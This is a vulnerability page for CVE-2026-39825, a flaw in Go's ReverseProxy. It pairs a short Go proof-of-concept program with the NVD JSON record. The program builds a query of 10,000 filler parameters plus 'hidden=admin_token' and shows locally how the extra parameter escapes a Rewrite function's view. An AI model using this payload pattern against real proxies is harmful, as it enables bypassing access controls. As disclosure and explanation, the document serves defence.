CVE-2026-39825

// PoC Concept for CVE-2026-39825 // This Go code demonstrates how to construct a payload that bypasses Rewrite checks. package main import ( "fmt" "net/url" "strings" ) func main() { // 1. Construct a payload with a large number of parameters to exceed GODEBUG=urlmaxqueryparams var paramsBuilder strings.Builder limit := 10000 // Assuming the limit is lower than this for i := 0; i < limit; i++ { paramsBuilder.WriteString(fmt.Sprintf("param%d=value&", i)) } // 2. Append the malicious parameter that should be hidden from the Rewrite function maliciousPayload := paramsBuilder.String() + "hidden=admin_token" fmt.Println("Constructed Payload:") fmt.Println(maliciousPayload[:100] + "...") // Print snippet // 3. Simulate what the Rewrite function sees (using url.ParseQuery) // If the limit is hit, ParseQuery might stop or error out, missing 'hidden' values, err := url.ParseQuery(maliciousPayload) if err != nil { fmt.Println("\n[Rewrite Function View] ParseQuery Error (as expected):", err) fmt.Println("Rewrite function might fail to parse 'hidden' parameter.") } else { if _, exists := values["hidden"]; !exists { fmt.Println("\n[Rewrite Function View] 'hidden' parameter NOT found (Bypass Successful)") } } // 4. The Backend receives the raw maliciousPayload string directly fmt.Println("\n[Backend View] Receives raw URL with 'hidden=admin_token'") }

{"cve": {"id": "CVE-2026-39825", "sourceIdentifier": "[email protected]", "published": "2026-05-07T20:16:43.390", "lastModified": "2026-05-08T22:16:29.547", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ReverseProxy can forward queries containing parameters not visible to Rewrite functions. When used with a Rewrite function, or a Director function which parses query parameters, ReverseProxy sanitizes the forwarded request to remove query parameters which are not parsed by url.ParseQuery. ReverseProxy does not take ParseQuery's limit on the total number of query parameters (controlled by GODEBUG=urlmaxqueryparams=N) into account. This can permit ReverseProxy to forward a request containing a query parameter that is not visible to the Rewrite function. For example, the query \"a1=x&a2=x&...&a10000=x&hidden=y\" can forward the parameter \"hidden=y\" while hiding it from the proxy's Rewrite function."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://go.dev/cl/770541", "source": "[email protected]"}, {"url": "https://go.dev/issue/78948", "source": "[email protected]"}, {"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M", "source": "[email protected]"}, {"url": "https://pkg.go.dev/vuln/GO-2026-4976", "source": "[email protected]"}]}}